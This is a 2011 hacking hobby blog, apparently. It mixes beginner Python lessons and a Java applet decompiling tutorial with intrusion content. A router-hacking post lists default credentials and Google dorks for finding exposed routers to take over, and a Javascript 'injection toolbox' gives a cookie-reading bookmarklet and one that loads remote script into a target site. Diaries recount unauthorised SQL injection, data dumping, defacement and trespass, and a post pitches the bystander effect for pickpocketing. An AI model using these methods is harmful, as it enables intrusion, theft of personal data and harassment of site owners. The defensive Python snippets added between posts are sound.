| welcome to social.hackers | posts are made by Clocwork and Shadowdrifter | added some new hack diaries + podcasts |

Monday, June 6, 2011

Python Programming Lesson Four. ( beginning strings )

Today’s lesson will be a short one, since we will just be discussing Python’s ability to write a user’s input to a text file. This code does two things: it takes whatever you type and assigns it to a variable, and then it writes that variable to a text file whose name you also choose.

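# Ask for the text to write and the name of the file to write it to
ttw = str(raw_input("Enter the text you would like to write to the file: "))
ftw = str(raw_input("What would you like to name the file: "))

# 'w' opens the file for writing and overwrites any existing file of that name
textfile = open(ftw, 'w')
textfile.write(ttw)
# Close the file so the text is flushed to disk
textfile.close()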

ttw and ftw are simply the variables for the text you want written to the file and the name to give the file. The “w” passed to open() means to write. Python has three main ways to interact with text files: write, read, and append.
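Because the lesson's code passes whatever the user types straight to open() in 'w' mode, a name such as ../something or an absolute path writes (and overwrites) outside the folder you intended. The following is an added example, not part of the original lesson, and it is written for Python 3 rather than the Python 2 used above; the function names and the output-directory idea are assumptions made for illustration.

```python
import os
import tempfile


class UnsafeFileName(ValueError):
    """Raised when a user-supplied file name is rejected."""


def resolve_in_dir(base_dir, user_name):
    """Return the absolute path for user_name inside base_dir, or raise."""
    if not user_name or "\x00" in user_name:
        raise UnsafeFileName("empty name or NUL byte")
    base = os.path.realpath(base_dir)
    # realpath collapses ".." and follows symlinks, so the comparison
    # below is made against the real destination of the write.
    target = os.path.realpath(os.path.join(base, user_name))
    if target == base or os.path.commonpath([base, target]) != base:
        raise UnsafeFileName("name escapes the output directory: %r" % user_name)
    return target


def write_user_text(base_dir, user_name, text, overwrite=False):
    """Write text to user_name inside base_dir and return the path used."""
    target = resolve_in_dir(base_dir, user_name)
    # 'x' creates the file and fails if it already exists, so an existing
    # file is only replaced when the caller asks for it explicitly.
    mode = "w" if overwrite else "x"
    with open(target, mode, encoding="utf-8") as fh:
        fh.write(text)
    return target


def demo():
    """Run the checks against constructed file names in a temporary folder."""
    results = {}
    with tempfile.TemporaryDirectory() as base:
        written = write_user_text(base, "notes.txt", "hello")
        results["first write"] = os.path.basename(written)
        for name in ("../escape.txt", "/etc/demo-should-not-exist.txt", ""):
            try:
                write_user_text(base, name, "x")
                results[name] = "written"
            except UnsafeFileName:
                results[name] = "rejected"
        try:
            write_user_text(base, "notes.txt", "second")
            results["second write"] = "written"
        except FileExistsError:
            results["second write"] = "refused, file exists"
        with open(written, encoding="utf-8") as fh:
            results["content"] = fh.read()
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print("%r: %s" % (key, value))
```

The with block also closes the file for you, even if the write raises an error.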

Site Update.

     You may have noticed the banner at the top, or the other ads we had shortly. To be able to bring you more content Clocwork and I are still working on getting a domain name and host. While there may be some changes over the next few weeks it will be nothing major.

Sunday, June 5, 2011

Python Programming Lesson Three.

In programming lesson three we will be covering the os module of Python, which allows you to use command line functions inside a Python program. Since most programs can be run from the command line, this has nearly unlimited possibilities. Unlike my other lessons, this one requires some knowledge of the command line, depending on your operating system. Windows and Mac/Linux use somewhat different commands, so this program will also be teaching you how to take a user’s input and use an if statement.

import os
opsys = raw_input("Are you using a Windows machine yes/no ")
if opsys == 'yes':
    print 'This will use the windows echo and %random% function'
    os.system('echo %random%')
if opsys == 'no':
    print 'This will use the linux echo command'
    os.system('echo hello')

You may notice the indentation, which is very important in Python. We are using the if statement to determine which OS the user is running so we can choose the appropriate commands to use.

Reverse Engineering Java Applets : Basic Level

This is a basic tutorial for reverse engineering Java Applets. Reverse engineering an applet has many uses, so I will not cover every single one of them; in this tutorial we will simply be using this method to understand how another applet works. Let us begin...

I will be doing this method from my OS (which is Ubuntu), so I will be doing a lot of command line for my compiling (because frankly I don't care enough to get a compiler). For these steps, use your own method of compiling a Java applet; there is not really one specific way to follow this tutorial.

For this tutorial you will need

- JDK (Java Development Kit), you can download this from Sun Microsystems' Website
- JAD (Java Decompiler), you can download this here
- Basic knowledge of Java
- Java Compiler (you can use your own, or do it from command line, it's still simple from command line, but most people want a GUI)


Once you've downloaded the JDK (if you didn't already have it) and the Java Decompiler, you're going to need to find an applet that you want to reverse engineer. I found (through searching "java applet examples" on Google) an applet that I thought would be perfect for this tutorial here

Basically, I just wanted to see how this applet works. So, I decided I'd crack it open and get to it.

First, we need to actually get the class file. The class file is the compiled binary that the Java Virtual Machine runs to display the applet (it can't run plain-text source like the code we read). To get this class file, we need to find out where the class file is located.

Note: Almost all class files will be in the same directory as the applet you're viewing

But, to be sure, we're going to right click the page and select the "View Source" option. Once we do that, we need to press Ctrl+F and search for "APPLET" (make sure that match case is off when you do this)

You want to keep searching until you find a tag that looks something like this


<APPLET CODE="image3dcube.class" WIDTH=250 HEIGHT=250>
Now, if you're not on the same website as me, then this will look different. But the class file that we're looking for is located after "CODE=". In this case, we can see that the class file is "image3dcube.class". So, to get this file we need to go into the URL bar, get rid of "applet2.html" and put "image3dcube.class" in its place.


You should then get a prompt asking you if you want to download the file. Obviously, you'll want to say yes. Now, the best place to save the file is in the folder or location where your Java Decompiler is. So, go and do that now. This is where the command line stuff will come in. What you'll want to do is change to the directory where your image3dcube.class file and your Java Decompiler are, and then you'll want to run your decompiler from the command line.

To do this in Linux or Mac, you'll just type this

./jad image3dcube.class

Now, in Windows, I'm assuming you just simply need to type "jad image3dcube.class" in your Command Prompt and it should work the same way. 
Either way you do it, you should end up getting a file named "image3dcube.jad". Just open this with a text editor and now you can see the code that is inside. Now, in order to run this file we need a few things.

- A new Java and Class file
- An applet for viewing

To create our new Java file, we select the code (ignoring the comments at the top) and copy it. Then, we create a new file (with the same name as the original file) but give it a .java extension. Then, paste the code from the .jad file into our new .java file and save it. Next, delete our old class file (the image3dcube.class) and run our compiler on our new Java file. To do this from the command line (which is easier because you should already be in the same directory), type:

javac image3dcube.java

This will compile the code and give you a new image3dcube.class file. You can now modify the code from the image3dcube.java file, compile, and then run it. But we need a way to actually view the applet. Unfortunately for us, the source code from the original applet uses parameters. So, in order for this code to run properly, we need to copy the applet code from the original site's source file and change some values.

The original code for the applet is this:

<APPLET CODE="image3dcube.class" WIDTH=250 HEIGHT=250>
<PARAM name="background" value="FFFFFF">
<PARAM name="shadowcolor" value="FFFFFF">
<PARAM name="textcolor" value="000000">
<PARAM name="spotlight" value="no">
<PARAM name="showlightbutton" value="no">
<PARAM name="sleeptime" value="5">
<PARAM name="target" value="_self">
<PARAM name="anglestep" value="8">
<PARAM name="mouseresponse" value="6">
<PARAM name="zoomspeed" value="4">
<PARAM name="image0" value="2comp1.gif">
<PARAM name="image1" value="2comp2.gif">
<PARAM name="image2" value="2comp3.gif">
<PARAM name="image3" value="2comp4.gif">
<PARAM name="image4" value="2comp5.gif">
<PARAM name="image5" value="2comp6.gif">
<PARAM name="url0" value="http://oran.k12.mo.us/fbla/index.html">
<PARAM name="url1" value="http://oran.k12.mo.us/fbla/index.html">
<PARAM name="url2" value="http://oran.k12.mo.us/fbla/index.html">
<PARAM name="url3" value="http://oran.k12.mo.us/fbla/index.html">
<PARAM name="url4" value="http://oran.k12.mo.us/fbla/index.html">
<PARAM name="url5" value="http://oran.k12.mo.us/fbla/index.html">
</APPLET>
Now, what you'll need to do is copy the applet code, then create a new .html file. I generally name this file "applet.html" because it's a general name. Once you've made this file, paste the code into it.

For applets that don't use parameters, you can simply copy and paste this:

<applet code="CLASS FILE HERE" width="WIDTH OF APPLET" height="HEIGHT OF APPLET"> </applet>

change the values, and it will run. But, since this applet uses parameters, we need to satisfy these parameters or change them if necessary. If we were trying to reverse engineer a real applet, we'd want all of the pictures that the applet originally used, but the general idea of this applet is that you can put in your own images. For the Linux users, you can use wget and usually get all of the images you need. For a guide to wget, go here. If you end up getting images you don't need, then try changing the level.

Luckily for us, this applet is very flexible about our images, and our original goal was to see how this worked, maybe improve it, and then put in our own images. So, to do this, all you need to do is put images (maximum of 6) on your server or in your folder (the same folder as your applet) and then change the applet's parameters to be the file name of those images. Then, open the applet or use "appletviewer YOUR FILE NAME HERE.html" and see if it works.


 There are many uses for reverse engineering a Java applet. To crack a password, to see where files are stored, or just to see how an applet works so that you can maybe improve your own code or heaven forbid leech the source. Anyway, I hope you enjoyed this tutorial, and you will hopefully be seeing some more useful tutorials later on in the future.

Thanks,
- Clocwork
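The manual steps above (find the APPLET tag in the page source, work out where the class file lives, then build a local applet.html with your own image parameters) can be scripted. This is an added example in Python 3, not part of the original tutorial; the page URL is a placeholder because the tutorial's link is not given, and it goes slightly beyond the text by also honouring a CODEBASE attribute, which moves the class file out of the page's own directory.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urljoin

# Constructed sample: the tutorial's <APPLET> block (shortened) in a minimal page.
SAMPLE_PAGE = """<html><body>
<APPLET CODE="image3dcube.class" WIDTH=250 HEIGHT=250>
<PARAM name="background" value="FFFFFF">
<PARAM name="sleeptime" value="5">
<PARAM name="image0" value="2comp1.gif">
<PARAM name="image1" value="2comp2.gif">
<PARAM name="url0" value="http://oran.k12.mo.us/fbla/index.html">
</APPLET>
</body></html>"""

# Placeholder address; the original page's URL is not given in the tutorial.
SAMPLE_PAGE_URL = "http://example.test/applets/applet2.html"


class AppletTagParser(HTMLParser):
    """Collect every <applet> tag with its attributes and <param> children."""

    def __init__(self):
        super().__init__()
        self.applets = []
        self._open = None

    def handle_starttag(self, tag, attrs):
        # HTMLParser lower-cases tag and attribute names, so APPLET and
        # applet both match without a case-insensitive search.
        attrs = {name: (value or "") for name, value in attrs}
        if tag == "applet":
            self._open = {"attrs": attrs, "params": {}}
            self.applets.append(self._open)
        elif tag == "param" and self._open is not None:
            self._open["params"][attrs.get("name", "")] = attrs.get("value", "")

    def handle_endtag(self, tag):
        if tag == "applet":
            self._open = None


def find_applets(html_text):
    """Return a list of {"attrs": {...}, "params": {...}} dictionaries."""
    parser = AppletTagParser()
    parser.feed(html_text)
    parser.close()
    return parser.applets


def class_file_url(page_url, applet):
    """Resolve the CODE attribute against the page URL (and CODEBASE, if set)."""
    codebase = applet["attrs"].get("codebase", "")
    if codebase and not codebase.endswith("/"):
        codebase += "/"  # CODEBASE names a directory
    base = urljoin(page_url, codebase)
    return urljoin(base, applet["attrs"].get("code", ""))


def build_local_page(applet, overrides):
    """Emit applet.html markup with selected parameter values replaced."""
    attrs = dict(applet["attrs"])
    attrs.pop("codebase", None)  # the recompiled class sits beside applet.html
    tag_attrs = " ".join('%s="%s"' % (k, escape(v)) for k, v in attrs.items())
    lines = ["<applet %s>" % tag_attrs]
    for name, value in applet["params"].items():
        value = overrides.get(name, value)
        lines.append('<param name="%s" value="%s">' % (escape(name), escape(value)))
    lines.append("</applet>")
    return "\n".join(lines)


if __name__ == "__main__":
    applet = find_applets(SAMPLE_PAGE)[0]
    print(class_file_url(SAMPLE_PAGE_URL, applet))
    # mine0.png and mine1.png are hypothetical local image names.
    print(build_local_page(applet, {"image0": "mine0.png", "image1": "mine1.png"}))
```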

Programming Lesson Number Two ( Math.py )

Today’s lesson will cover the Python math module and Python’s built-in math operators. The math module is specifically designed to expand Python’s mathematical functionality by adding things such as square roots, sin, cos, and tan. If you have ever tried to make a program to solve certain math problems and found yourself lacking certain functions, you will be lacking no longer! The built-in math operations in Python are addition, subtraction, multiplication, and division. I will once more be adding code that uses the math module and each of the built-in math operations.

import math
print 5+5
print 5*5
print 5/5
print 5-5
print math.sqrt(25)
raw_input()

import math imports the math module, which allows you to use the math.sqrt function. You may not have seen raw_input() used like this before, but it is a simple way to pause the program until the user wishes to continue.

Saturday, June 4, 2011

AWUS036H Product Review

Today I, Shadowdrifter, would like to tell you about an item I recently bought. It is the AWUS036H long range wi-fi antenna. It came with two antennas and two adapters; the smaller increases my wi-fi range by around 200 feet, where the larger antenna can increase it by 600-700 feet. This also comes with an installation disc for older computers, but it shouldn’t usually be needed. So for anyone into wireless security this is the perfect antenna, since it worked on my Backtrack4 right out of the box. It supports deauth for WPA-PSK and packet injection. The package I bought is Alfa AWUS036H 1000mW 1W 802.11b/g High Gain USB Wireless Long-Range WiFi network Adapter with 5dBi and 9dBi Screw-On Swivel Rubber Antenna and Mini bendable Flex cable for Better adjustment.
You may have realized there is an amazon ad in this post, I would like to take the time to explain why. Recently Clocwork and I have been wanting to transfer to a real host, and get our own domain name so we will be adding some ads to try and afford this domain/hosting! So if you would like to help out just add it as a comment, thank you for reading this.

Friday, June 3, 2011

Programming Lesson Number one.

This is the first edition of the Shadowdrift programming lessons. During these lessons I will be teaching you the basics of the Python language. Today’s lesson will be on installing Python, using modules, and assigning variables. Installing Python is very straightforward: go to this link and download the first file. After running the MSI installer you will be able to run Python programs. Now, similar to headers in C/C++, Python stores functions in modules, which are easily imported with something as simple as import modulename. At the end of this lesson I will include some code you can easily use to test these modules. The third and final part of our lesson is assigning variables. To assign a variable in Python you write it like this: variablename = variable, i.e. a = ‘123’. The following code uses Python, of course, and the two things we have covered: modules and variables.

    import time
    a = time.time()
    print a
    time.sleep(3)

[EBOOK] Ye Old Social Engineering [$5]

We recently finished our ebook on Social Engineering techniques. This book consists of many ways to gain information through reconnaissance, make money through somewhat illicit means, and also we reveal some secrets that we found. We hope that you enjoy this book!



Thanks,
- Clocwork and Preistpower

Doxing Assistant V4 or AIO.

I have recently added the finishing touches to my doxing tool version 4.0. For those unfamiliar with the doxing assistant, it is based on a simple tool Clocwork made over a year ago. Inspired by his design, I started by learning his code, and then added some of my own. It has become one of my biggest projects, and one I am incredibly proud of. The program and its needed module have been uploaded to Sourceforge. The program uses many Python functions to complete tasks ranging from decrypting hashes, encrypting hashes, html extracting for sql, sql table bruteforcing, custom password generating, random password generating, and dox assistance to even console based doxing. If you do not understand any of the code please comment, and I will respond as soon as possible.

Thursday, June 2, 2011

Chat bot.

Hello, I have recently been working on a new project I call it Socrabot after the philosopher Socrates. The reason for this program is so I can enter the Chatterbox Challenge which is a contest to create the smartest chat bot you can. The contest for this will begin in March so I have until then to improve him. If you have any suggestions/questions you would like added to his database please let me know in the comments section, and I will.

Wednesday, May 11, 2011

CONGRATS TO SHADOWDRIFTER!

Congrats Shadowdrifter!

One of our writers, Shadowdrifter, has made an outstanding article about hacking Audix systems. His article was recently published on a hacking security website called mrcracker.

Here is just a little taste of the article

So as many of you know cell phone voicemails are incredibly insecure. Now for reconnaissance this isn’t useful when you are gathering information on big companies. Mostly due to the fact that employee cell phones are often private. When doing reconnaissance you should always be aware of the information you have already found, and how it can be used. That's where an employee directory comes in handy. Many top businesses use the Audix voicemail system so knowledge of the system is invaluable.

So, head on over to mrcracker to view the article now. Again, congratulations Shadowdrifter!

Simple coin flip simulation.

By simple coin flip simulation I mean that I created a program with Python to "simulate" flipping a coin 100 times, which then returns the result. It is a simple program using lists and the random module built into Python.


import random
# Assigning the variables
i = 1
h = 1
t = 2
lit = []
lih = []
# Starting the loop
while 101 > i:
    # Random function to select 1 or 2 to represent heads and tails.
    data = random.randint(h, t)
    print data
    i = i + 1
    data = int(data)

    # 1 counts as heads
    if data == 1:
        lih.append("1")

    # 2 counts as tails
    if data == 2:
        lit.append("2")

# Count the flips after the loop has finished
e = len(lit)
e = str(e)
f = len(lih)
f = str(f)
print 'You flipped tails ' + e + ' ' + 'times ' + 'and ' + 'You flipped heads ' + f + ' times'
raw_input()


This is just an example of what you can do with very simple functions, and just a few lines of code.

Sunday, May 8, 2011

PODCAST : Episode Four - Dead Drops


In this episode Clocwork briefly talks about Dead Drops.

Saturday, April 30, 2011

Router Hacking.

Today's post is on router hacking. I am not going very in-depth on how to hack routers; I will just be going over a few ways to find unsecured and poorly configured routers. The simplest way is to gain access to the network and go to the router page, commonly at 192.168.1.1. You will encounter routers without passwords, but you should learn some of the most common default passwords for routers just in case.

Common default passwords for any router username:password:


admin:admin
admin:password
admin:(no password)
(nothing in either username or password)
admin:guest
guest:password

Those few password combinations will be the most commonly used. I personally used admin:admin just the other day. Now we have logged into the router, so what can we do? Well, the first thing we can do is enable remote management (the ability to control the router from a remote location); it is different for each router, and some do not even have the option. If you do happen to find the option, you will need to change the default password and make sure you allow your I.P address to connect. This is all very self-explanatory when you are familiar with routers. By the end of this post you will be well on your way to becoming an expert at router configuration.

Now it's easy to find routers just by finding secured and unsecured wireless networks to try and access. There are also a lot of routers whose web interfaces are actually indexed in Google! So with a simple Google dork we can find dozens, even hundreds, of unsecured routers just waiting for someone to experiment with.

Google dorks to find routers:

intitle:"SpeedStream * Management Interface"      ( Speed Stream routers )

intitle:"Setup Home" "You will need * log in before * * change * settings"  ( Belkin routers )

intitle: "actiontec" main setup status " Copyright 2001 Actiontec Electronics Inc"


Those three dorks should keep you busy for quite some time. Now there is one more method, which is really hit and miss. If you happen to find a target, port scan them and look for port 23, which is Telnet by default. There are a lot of off-the-shelf routers with Telnet active and only the default passwords in place, which are very similar to the default router passwords except for a select few.

Default Telnet router passwords:


guest:guest
guest:password
user:guest
admin:guest

That is all for now; may your blades stay sharp, your mind sharper! Shadowdrifter.

Using the Bystander Effect

The term bystander effect refers to the phenomenon in which the greater the number of people present, the less likely people are to help a person in distress.
- Darley, J. M. & Latané, B. (1969). Bystander “apathy.” American Scientist, 57, 244-268.


      The Bystander Effect, although a phenomenon, can have some practical use in Social Engineering. 


PLEASE NOTE: This effect will not happen every single time as there are good people in this world that are willing to help those in distress. We do not condone using this for illegal purposes, this post is only for information about psychological phenomenon. 

     Standard tests done by many psychologists involve the use of an injured victim lying in the middle of a busy sidewalk. Passers-by simply ignore the injured person and continue walking no matter how much the person in distress is moaning. Occasionally, someone will confront the injured victim and ask if he or she needs any assistance. The number of people that actually help is very slim when compared to the number of people that simply continue walking.


     Most psychologists say this is because people are lazy; other psychologists say that it's because no one else sees the distressed person as a priority, so it must not be that big of a deal. Others, including myself (even though I'm not a psychologist), say that they simply avoid the distressed person because they think the person could be pulling a con. However, keep all of these points in mind, as they could be useful for a Social Engineer.


     Let's say someone gets pick-pocketed. They start to fuss, they make a big commotion, and they tell people to stop the pickpocket. Now let's say that you had a group of people just walk by the distressed person, completely ignoring him. There is a high chance that everyone else around the distressed person would do absolutely nothing simply because no one else was doing anything.


     In theory, a group of pick-pockets could go around and steal purses, wallets, sunglasses etc. in the most non-secretive way possible and they would be able to get away with it (so long as the victim doesn't start chasing after the pick-pocket). 


     A Social Engineer can use this effect in many ways to get away with certain crimes. The biggest factor is the number of people that the Social Engineer has with him. If there's a smaller number of people, the less likely it is that he will get away with his con. The larger the number of people, the easier it will be to get away with it. 


So ask yourself, if you saw someone in distress, would you help them? What if no one else was helping them, would you still help them, or would you just walk away?


Thanks for reading,
- Clocwork

Friday, April 29, 2011

PODCAST : Episode Three - Phreaking


In this podcast we discuss different types of phreaking methods, and you get to hear a prime example of Social Engineering from Ian.

Clocwork Hack Diary : Random Mischief Part One

Posted From My Droid


I feel like I've been getting too soft lately, like I haven't done anything really mischievous. So, I've decided that I'm going to be doing random acts of mischief until I'm satisfied. Currently, I'm seated in a lawn chair on the porch of another person's house smoking a cigar and watching some birds fight over seed in a bird feeder. To make it more interesting, the person doesn't know I'm here, and I don't know the person at all. I hope they don't show up, but, I need some water, and I know where to get it.



Now I'm seated in a chair at some private pool area. Just got a drink of water from the water fountain out here. Someone just yelled at me and told me to leave, I'm telling him I needed some water. Walking over to the water fountain again. Water just shot in my face, lol. Just got some water, the guy is still staring at me. About to hop the fence and continue with my running. Since today is Friday and tomorrow is Saturday (and Sunday comes afterwards, Rebecca Black reference bitches) I'll probably do some more mischief then. But, I gotta get home and upload the next podcast, gotta run about 3 miles back and then I'll post it.



Thanks for reading,

-Clocwork

P.S. That guy stared at me the whole time I wrote that last message, now his kid is staring at me. Oh well, I just needed some water

Thursday, April 28, 2011

Clocwork Hack Diary : The Festival

 *Sorry for this post being a lot later than Shadow's. Been busy with some other stuff and never really got down to writing this one.*


It started off like any other normal Sunday, woke up late, did some stuff, and then sat down at my computer and got on Skype. I saw a message from Shadow talking about how he found some vulnerable website. He messaged me the website and I saw that it was vulnerable to SQLi. After a little pen-testing on the site, we saw that the only vulnerability on the site was SQLi. So, we got down to business doing some different commands (of course the site had to be v.4 right?). 

     We managed to find some tables, but unfortunately for us the tables for users and admins (if they existed) didn't have any information in them at all. I kept trying to find more and more tables and then it hit me to go ahead and try out the names of the different events (in case you couldn't tell by the title, this website was a site about a festival that happens every year, the site apparently is done by volunteers, go figure, and everyone in the festival is a volunteer). Sure enough, the names of the events gave us a lot of information: emails, addresses, and names for people in large organizations as well as the "Festival Queen" and some country music stars (yay.........).


      After extracting basically the entire database in about 10 minutes, Shadow messages me saying that the admin of the site has a vulnerable password. In fact, the password was the first name of the festival (ie. if the festival name is Lorem Ipsum, the password was lorem). So, thanks to pure human stupidity, we were able to actually access the site.

     Shadow didn't want to deface, but I wanted to screw around as I hadn't had a successful hack in a while. So, me being me, I posted some Pedobear images in the "Kids Festival" section, and added a nice page explaining how we did what we did, or really... how Shadow did what he did. After a little more screwing around, the admin finally erased the pages, and reverted the page back to normal, and changed everyone's password. Well, the admin forgot to change his own password, so we had access to the admin panel once again. This time I decided to send messages to everyone on the staff explaining how weak the security of the website was. This was fun, but the interesting part has yet to come.

     Later on we got bored again and we created a new user on the page, gave him admin privileges, and then logged in to the site as him (because the admin finally had the sense to change the Wordpress passwords, but again we still had access to the site panel, which allows us to edit all of the events). As we were on the site, the admin started to change all of the user passwords to a random string of characters and he deleted our account, but their biggest flaw was the fact that they had their logins as PHP Sessions with no timeout. So, if we wanted to, we could still be an admin today as long as we didn't log out (if the site were still up that is, the festival is over now though).

     Since we knew the admin was at his computer, we decided to call the guy up and tell him about what we had done. We told him how we got in, and how he could fix it, and I also gave him some suggestions on his PHP code (which is funny because I'm only 17 and I'm definitely not an expert at PHP). To my surprise, he was actually very grateful for the help (or so it seemed) and he even offered us a job working on the site for next year's festival. Guess good can pay off after all.

Thanks for reading, and I hope you enjoyed my first hack diary,
- Clocwork
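The flaw the diary ends on, login sessions with no timeout that kept working after passwords were changed and the account was deleted, is fixed on the server side by expiring sessions and revoking them whenever the account changes. The following is an added example and not the festival site's code: the site used PHP, while this is a language-neutral sketch in Python 3, and the class name, method names and timeout values are assumptions chosen for illustration.

```python
import secrets
import time

IDLE_TIMEOUT = 15 * 60           # seconds of inactivity allowed (assumed value)
ABSOLUTE_LIFETIME = 8 * 60 * 60  # maximum session age in seconds (assumed value)


class SessionStore:
    """In-memory session table with idle timeout, absolute lifetime and revocation."""

    def __init__(self, clock=time.time):
        self._clock = clock
        self._users = set()
        self._sessions = {}  # session id -> {"user", "created", "last_seen"}

    def add_user(self, user):
        self._users.add(user)

    def login(self, user):
        if user not in self._users:
            raise KeyError("unknown user: %r" % user)
        sid = secrets.token_urlsafe(32)  # unguessable session identifier
        now = self._clock()
        self._sessions[sid] = {"user": user, "created": now, "last_seen": now}
        return sid

    def validate(self, sid):
        """Return the user name for a live session, or None."""
        session = self._sessions.get(sid)
        if session is None:
            return None
        now = self._clock()
        expired = (now - session["last_seen"] > IDLE_TIMEOUT
                   or now - session["created"] > ABSOLUTE_LIFETIME)
        # A session never outlives its account, even if revocation was missed.
        if expired or session["user"] not in self._users:
            del self._sessions[sid]
            return None
        session["last_seen"] = now
        return session["user"]

    def revoke_user(self, user):
        """Drop every session of a user; call this on any password change."""
        doomed = [sid for sid, s in self._sessions.items() if s["user"] == user]
        for sid in doomed:
            del self._sessions[sid]
        return len(doomed)

    def delete_user(self, user):
        self._users.discard(user)
        return self.revoke_user(user)


class FakeClock:
    """Controllable clock so the demo does not have to sleep."""

    def __init__(self, start=1000.0):
        self.t = start

    def now(self):
        return self.t

    def advance(self, seconds):
        self.t += seconds


def demo():
    """Replay the diary's sequence of events with constructed accounts."""
    clock = FakeClock()
    store = SessionStore(clock=clock.now)
    store.add_user("admin")
    store.add_user("rogue")  # stands in for the account the intruders created
    admin_sid, rogue_sid = store.login("admin"), store.login("rogue")
    out = {"fresh": store.validate(admin_sid)}
    out["sessions dropped on delete"] = store.delete_user("rogue")
    out["deleted account"] = store.validate(rogue_sid)
    clock.advance(IDLE_TIMEOUT + 1)
    out["idle too long"] = store.validate(admin_sid)
    busy_sid = store.login("admin")
    seen = []
    for _ in range(35):  # active every 14 minutes for 490 minutes
        clock.advance(14 * 60)
        seen.append(store.validate(busy_sid))
    out["busy session"] = seen
    last_sid = store.login("admin")
    out["sessions dropped on password change"] = store.revoke_user("admin")
    out["after password change"] = store.validate(last_sid)
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "->", value)
```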

PODCAST : Episode Two - Picking Your Target



Thanks to YouTube time restrictions, we had to divide this podcast up into three segments.

In this podcast we discuss how to pick a target for hacking, and also how to defend yourself from people like us. 

Saturday, April 23, 2011

Javascript Injection Toolbox

This is for all of the skids out there that want some easy to use scripts. Recently Shadow and I have been working on new methods to hack websites. I, Clocwork, have been focusing on learning Javascript since PHP is fairly easy to understand (although it is rather tedious). Well, I came across Javascript injection a little while ago and I realized that it could essentially be a great tool for me to use later on. So, without further ado, here is my Javascript Injection Toolbox.

Requirements :
- Computer with internet access
- Some basic knowledge of Javascript

Recommended :
- Firefox Browser


What is this toolbox?
 
Basically, this toolbox is a collection of scripts that make Javascript Injection a lot easier and are stored in your browser's Bookmark Bar.

You can easily make your own scripts if you have knowledge of the language. I threw together my "Execute Remote JS" script in about a minute with very little knowledge of the language.

How do I Make it?

     Go to your Bookmark Bar (Firefox) and right click on it. Now, select the option "New Folder." You can name this folder anything you want, I just named mine "Scripts" to save space (since my bookmark bar is actually rather full). 
     Now, right click on the Bookmark Bar again. Select the option "New Bookmark." You should see a box like this (the title will be different)

In the "Name" field, you can put whatever you like, but, the location is the important part of this tutorial.

STOP (Please Read)

In case you don't know what you're doing, these bookmarks will allow you to execute Javascript scripts in your browser. To see what I mean, copy this

javascript:alert(document.cookie);

and put it in your URL bar right now. You should see something pop up with all of your cookie information. The use of this "javascript" command allows us to execute codes from our browser.

GO

Now, in the location field, you can put whatever script you wish to run. The idea of this toolbox is make tedious commands simple to use. For instance, if you're someone that likes to modify or spoof cookies, you would want a script that displays cookies for you (like the one I mentioned above).

Of course, these scripts can be more interactive. For instance, here's a code I created to execute remote Javascript files from a site.

javascript:function%20display(){var%20location=prompt("WHAT%20IS%20THE%20LOCATION%20OF%20THE%20FILE?","127.0.0.1");%20document.write('<script%20type="text/javascript"%20src="'%20+%20location%20+%20'"></script>');}%20display();

This way, I can modify my remote file at any time without having to change my bookmark.

Execution

To execute these commands, you simply go to your target website, click on your "Scripts" folder and select the script you wish to run. It's simple, and it takes less time than physically typing in the commands yourself. 

Conclusion

The rest of the toolbox is up to you. The first two codes were to get you going, but you can literally put any code you like (as long as its javascript) in these bookmarks. Again, the idea is to use flexible scripts (ones that you can run on any website, you just click once and the code is done), or advanced scripts (allows for more flexibility when you have more diverse sites)

So, I hope you enjoyed this idea, if someone else has had the same idea then awesome. I myself like to have things organized (even though my room is a mess) so I decided I'd go ahead and make a tutorial on this simple thing.

Thanks for reading,
- Clocwork


(check out the thread on HackForums http://www.hackforums.net/forumdisplay.php?fid=47 )
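The cookie display script above shows only what page script is allowed to read: a cookie the server sets with the HttpOnly attribute never appears in document.cookie. The following is an added example in Python 3, not part of the original post, that audits Set-Cookie header values for that attribute (and for Secure and SameSite) and builds a hardened session cookie; the function names and the header values are constructed for illustration.

```python
from http.cookies import SimpleCookie

# Constructed Set-Cookie header values, as a site owner might capture
# from their own application's responses.
SAMPLE_HEADERS = [
    "sid=abc123; Path=/",
    "theme=dark; Path=/; SameSite=Lax",
    "auth=tok456; Path=/; Secure; HttpOnly; SameSite=Strict",
]


def audit_set_cookie(header_value):
    """Map each cookie name in one Set-Cookie value to its missing attributes."""
    jar = SimpleCookie()
    jar.load(header_value)
    findings = {}
    for name, morsel in jar.items():
        missing = []
        if not morsel["httponly"]:
            missing.append("HttpOnly")  # readable through document.cookie
        if not morsel["secure"]:
            missing.append("Secure")    # may be sent over plain HTTP
        if not morsel["samesite"]:
            missing.append("SameSite")  # browser default applies
        findings[name] = missing
    return findings


def script_visible_cookies(header_values):
    """Names of the cookies that page script could read via document.cookie."""
    visible = []
    for header_value in header_values:
        for name, missing in audit_set_cookie(header_value).items():
            if "HttpOnly" in missing:
                visible.append(name)
    return visible


def build_session_cookie(name, value):
    """Return a Set-Cookie value with the protective attributes applied."""
    jar = SimpleCookie()
    jar[name] = value
    morsel = jar[name]
    morsel["path"] = "/"
    morsel["httponly"] = True
    morsel["secure"] = True
    morsel["samesite"] = "Lax"
    return morsel.OutputString()


if __name__ == "__main__":
    for header in SAMPLE_HEADERS:
        print(header, "->", audit_set_cookie(header))
    print("visible to script:", script_visible_cookies(SAMPLE_HEADERS))
    print("hardened:", build_session_cookie("sid", "abc123"))
```

HttpOnly only hides the cookie from script; it does not stop injected script from acting inside the logged-in page, so it complements fixing the injection point rather than replacing that fix.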

Friday, April 22, 2011

Hakipedia.

So a friend of mine showed me a "new" site, well, new to me. If you read the title you may already know of the site, but for those who did not: http://hakipedia.com/index.php/Hakipedia . It's very self-explanatory; it looks like Wikipedia, and functions like it as well. The subject is most obviously hacking and security. There are not a lot of articles yet, but I will be writing some, and as I write them I will make a post to inform you of the new page. Lately I have been a bit obsessed with wifi and War Driving. So the first article I wrote was on War Driving, which is, just to sum it up, the act of searching out wireless access points to document or use for your own needs. In case you have trouble finding the War Driving article, here ya go! http://hakipedia.com/index.php/War_Driving .

If you have any comments on it please message me on that site my name is Whitehaze.

Signed, Shadowdrifter.

Monday, April 18, 2011

Shadowdrifter Hack Diary : The Festival

I had tested dozens of sites for vulnerabilities, finding none. When I was ready to give up I stumbled across a site that was vulnerable to SQL. When I noticed that the SQL version was 4, I was filled with anger and hatred. After many attempts at finding the user tables I decided my time was best spent getting my normal four hours of sleep. I sent a message to my colleague Clocwork, and took my rest.

